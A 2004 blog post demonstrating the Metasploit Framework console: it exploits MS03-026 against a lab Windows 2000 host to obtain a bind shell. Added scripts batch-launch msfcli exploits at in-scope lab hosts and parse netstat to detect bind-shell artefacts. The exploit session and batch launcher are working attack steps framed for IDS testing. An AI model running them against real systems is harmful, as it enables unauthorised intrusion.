Monday, April 12, 2004

Metasploit Framework in Action

You may have seen the Slashdot article on the Metasploit Project. From the project's Web site:

"The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This release includes 18 exploits and 27 payloads; many of these exploits are either the only ones publicly available or just much more reliable than anything else out there. The Framework will run on any modern system that has a working Perl interpreter."

I gave the project a try. First I read the Crash Course user's guide, which told me to install p5-ReadLine-Gnu. I did so using the FreeBSD ports tree:

orr:/usr/ports/devel/p5-ReadLine-Gnu# make install
===> Vulnerability check disabled, database not found
>> Term-ReadLine-Gnu-1.14.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
>> Attempting to fetch from http://www.cpan.dk/CPAN/modules/by-module/Term/.
Receiving Term-ReadLine-Gnu-1.14.tar.gz (65140 bytes): 100%
...truncated...

Once done, I ran msfconsole and used one of the included exploits to compromise a Windows 2000 system in my lab. First I run msfconsole:

orr:/home/richard/framework-2.0$ perl ./msfconsole
+ -- --=[ msfconsole v2.0 [18 exploits - 27 payloads]

msf > help

Metasploit Framework Main Console Help
======================================

?         Show the main console help
cd        Change working directory
exit      Exit the console
help      Show the main console help
info      Display detailed exploit or payload information
quit      Exit the console
reload    Reload exploits and payloads
save      Save configuration to disk
setg      Set a global environment variable
show      Show available exploits and payloads
unsetg    Remove a global environment variable
use       Select an exploit by name
version   Show console version

Next I check out the loaded exploits and select one for MS03-026:

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

apache_chunked_win32         Apache Win32 Chunked Encoding
blackice_pam_icq             Blackice/RealSecure/Other ISS ICQ Parser Buffer Overflow
exchange2000_xexch50         Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked    Frontpage fp30reg.dll Chunked Encoding
ia_webmail                   IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post          IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow       IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll           IIS 5.0 WebDAV ntdll.dll Overflow
imail_ldap                   IMail LDAP Service Buffer Overflow
msrpc_dcom_ms03_026          Microsoft RPC DCOM MSO3-026
mssql2000_resolution         MSSQL 2000 Resolution Overflow
poptop_negative_read         PoPToP Negative Read Overflow
realserver_describe_linux    RealServer Describe Buffer Overflow
samba_trans2open             Samba trans2open Overflow
sambar6_search_results       Sambar 6 Search Results Buffer Overflow
servu_mdtm_overflow          Serv-U FTPD MDTM Overflow
solaris_sadmind_exec         Solaris sadmind Command Execution
warftpd_165_pass             War-FTPD 1.65 PASS Overflow

msf > use msrpc_dcom_ms03_026

Once I have an exploit selected, I need to set the options it needs:

msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

Exploit:   Name    Default   Description
--------   -----   -------   ------------------
required   RPORT   135       The target port
required   RHOST             The target address

msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.3
RHOST -> 10.10.10.3

msf msrpc_dcom_ms03_026 > show targets

Supported Exploit Targets
=========================

0 Windows NT SP6/2K/XP ALL

With an exploit selected, I also need to choose a payload. This tells the Metasploit framework how I wish to interact with the target. I choose a simple binding connection.

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads
====================================

winadduser              Create a new user and add to local Administrators group
winbind                 Listen for connection and spawn a shell
winbind_stg             Listen for connection and spawn a shell
winbind_stg_upexec      Listen for connection then upload and exec file
winexec                 Execute an arbitrary command
winreverse              Connect back to attacker and spawn a shell
winreverse_stg          Connect back to attacker and spawn a shell
winreverse_stg_ie       Listen for connection, send address of GP/LL across, read/exec InlineEgg
winreverse_stg_upexec   Connect back to attacker and spawn a shell

msf msrpc_dcom_ms03_026 > info payload winbind

       Name: winbind
    Version: $Revision: 1.15 $
     OS/CPU: win32/x86
Needs Admin: No
 Multistage: No
 Total Size: 374

Provided By:
H D Moore [Artistic License]

Available Options:
optional: EXITFUNC Exit technique: "process", "thread", "seh"
required: LPORT Listening port for bind shell

Description:
Listen for connection and spawn a shell

msf msrpc_dcom_ms03_026 > set PAYLOAD winbind
PAYLOAD -> winbind

msf msrpc_dcom_ms03_026(winbind) > show options

Exploit and Payload Options
===========================

Exploit:   Name       Default      Description
--------   -----      ----------   ------------------
required   RPORT      135          The target port
required   RHOST      10.10.10.3   The target address

Payload:   Name       Default      Description
--------   --------   -------      ------------------------------------------
optional   EXITFUNC   seh          Exit technique: "process", "thread", "seh"
required   LPORT                   Listening port for bind shell

msf msrpc_dcom_ms03_026(winbind) > set LPORT 9999
LPORT -> 9999

Once I have set the required options, I launch the exploit and get a shell:

msf msrpc_dcom_ms03_026(winbind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x90e5
[*] Got connection from 10.10.10.3:9999

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>netstat -na
...edited...
TCP 10.10.10.3:9999 192.168.50.2:26297 ESTABLISHED
...truncated...
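The interactive session above (use the exploit, set RHOST, set PAYLOAD, set LPORT, exploit) can be driven non-interactively when the same exploit has to be fired at several lab hosts, for example to exercise a sensor from a batch job. The script below is an added example written for this page, not code from the original post or from the Metasploit Project. It assumes the Framework 2.x msfcli front end that ships beside msfconsole, invoked as perl ./msfcli EXPLOIT KEY=VALUE ... MODE with the mode letter E meaning exploit; the mode letters, the lab scope network and the target list are assumptions, and the script refuses to build an exploit command for any address outside that scope so a typo cannot send an exploit beyond the lab.

```python
"""Batch driver for the Metasploit 2.x command-line client (msfcli).

Added example written for this page; not code from the original post or from
the Metasploit Project.  Assumptions: 'msfcli' sits beside msfconsole and is
invoked as  perl ./msfcli EXPLOIT KEY=VALUE ... MODE  where MODE 'E' runs the
exploit; the lab scope and target list below are constructed.
"""
import ipaddress
import subprocess
from typing import Dict, List

# Only hosts inside these networks may be targeted (constructed lab scope).
AUTHORIZED_SCOPE = [ipaddress.ip_network("10.10.10.0/24")]

# msfcli mode letters (assumed from the 2.x front end): Summary, Options,
# Advanced, Payloads, Targets, Check, Exploit.
MODES = {"S", "O", "A", "P", "T", "C", "E"}


def in_scope(host: str) -> bool:
    """True if host is an IP address inside an authorized network."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in AUTHORIZED_SCOPE)


def build_msfcli(exploit: str, options: Dict[str, str], mode: str = "E",
                 perl: str = "perl", msfcli: str = "./msfcli") -> List[str]:
    """Return the argv for one msfcli run.

    The console session is 'use EXPLOIT', several 'set KEY VALUE' lines,
    then 'exploit'; msfcli folds those into a single command line.
    """
    if mode not in MODES:
        raise ValueError(f"unknown msfcli mode {mode!r}")
    rhost = options.get("RHOST")
    # Only the modes that touch the target (check, exploit) need a scoped RHOST.
    if mode in ("C", "E") and not in_scope(rhost or ""):
        raise ValueError(f"RHOST {rhost!r} is missing or outside the lab scope")
    lport = options.get("LPORT")
    if lport is not None and not 1 <= int(lport) <= 65535:
        raise ValueError(f"LPORT {lport!r} is not a valid TCP port")
    argv = [perl, msfcli, exploit]
    argv += [f"{key}={value}" for key, value in sorted(options.items())]
    argv.append(mode)
    return argv


def run_batch(targets: List[str], exploit: str = "msrpc_dcom_ms03_026",
              payload: str = "winbind", lport: int = 9999,
              dry_run: bool = True) -> Dict[str, str]:
    """Build one msfcli command per target; execute it only when dry_run is off.

    A shell payload such as winbind leaves msfcli attached to the shell, so an
    unattended run should use a non-interactive payload (winadduser, winexec).
    """
    results: Dict[str, str] = {}
    for host in targets:
        options = {"RHOST": host, "PAYLOAD": payload, "LPORT": str(lport)}
        try:
            argv = build_msfcli(exploit, options)
        except ValueError as exc:
            results[host] = f"skipped: {exc}"   # out-of-scope host or bad option
            continue
        if dry_run:
            results[host] = " ".join(argv)
        else:
            proc = subprocess.run(argv, capture_output=True, text=True, timeout=300)
            results[host] = proc.stdout + proc.stderr
    return results


if __name__ == "__main__":
    # Constructed target list: one lab host, one host outside the scope and
    # one non-address.  Nothing is executed because dry_run defaults to True.
    for host, outcome in run_batch(["10.10.10.3", "192.168.50.9", "not-a-host"]).items():
        print(f"{host}: {outcome}")
```

Run it once with dry_run left on to review the exact command lines, then flip dry_run off for the real pass; the scope check is the part worth keeping even if the rest is replaced by a one-line loop.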

I see this project providing an easy way to launch exploits to test IDS deployments. It's very powerful and flexible. Previously I used raccess to easily launch exploits for IDS testing purposes.
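Beyond watching the IDS, the netstat output above is the host-side artefact a bind-shell payload leaves: a listener on the chosen LPORT and an ESTABLISHED session from the attacking host. The script below is an added example for this page, not code from the original post or from the Metasploit Project; it parses Windows 2000 netstat -na output and flags listeners outside an expected baseline and established sessions from peers outside a trusted range. The sample listing is constructed to resemble the one shown above, and the baseline ports and trusted peer prefix are assumptions for a default Windows 2000 lab host.

```python
"""Flag bind-shell artefacts in Windows 'netstat -na' output.

Added example written for this page; not code from the original post or the
Metasploit Project.  The sample listing, the baseline of expected listeners
and the trusted peer prefix are constructed assumptions.
"""
import re
from typing import Dict, List, Tuple

# Windows netstat rows look like:
#   TCP    10.10.10.3:9999        192.168.50.2:26297     ESTABLISHED
#   UDP    0.0.0.0:135            *:*
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\d+|\*)\s*(\w+)?\s*$")

# Ports a stock Windows 2000 host is expected to listen on (assumption).
EXPECTED_LISTENERS = {135, 139, 445, 1025}
# Address prefixes allowed to hold established sessions (constructed lab net).
TRUSTED_PEERS = ("10.10.10.",)


def parse_netstat(text: str) -> List[Dict[str, object]]:
    """Turn netstat -na text into rows; headers and blank lines are skipped."""
    rows: List[Dict[str, object]] = []
    for line in text.splitlines():
        match = ROW.match(line)
        if not match:
            continue
        proto, laddr, lport, raddr, rport, state = match.groups()
        rows.append({"proto": proto, "laddr": laddr, "lport": int(lport),
                     "raddr": raddr, "rport": rport, "state": state or ""})
    return rows


def find_suspicious(rows: List[Dict[str, object]]) -> List[Tuple[str, int, str]]:
    """Return (reason, local port, foreign address) for rows worth a look."""
    findings: List[Tuple[str, int, str]] = []
    for row in rows:
        if row["proto"] != "TCP":
            continue
        lport = int(row["lport"])
        raddr = str(row["raddr"])
        if row["state"] == "LISTENING" and lport not in EXPECTED_LISTENERS:
            findings.append(("unexpected-listener", lport, raddr))
        elif row["state"] == "ESTABLISHED" and not raddr.startswith(TRUSTED_PEERS):
            findings.append(("untrusted-peer", lport, raddr))
    return findings


# Constructed sample resembling the Windows 2000 listing above: the winbind
# payload listening on 9999 and the attacker's session to it.
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9999           0.0.0.0:0              LISTENING
  TCP    10.10.10.3:139         0.0.0.0:0              LISTENING
  TCP    10.10.10.3:9999        192.168.50.2:26297     ESTABLISHED
  UDP    0.0.0.0:135            *:*
"""


if __name__ == "__main__":
    for reason, port, peer in find_suspicious(parse_netstat(SAMPLE)):
        print(f"{reason}: local port {port}, foreign {peer}")
```

The baseline approach is deliberately simple: anything that listens where the build image did not, or talks to a peer outside the management range, is reported. A reverse payload (winreverse) leaves no new listener, only the outbound ESTABLISHED row, which is why the second check matters as much as the first.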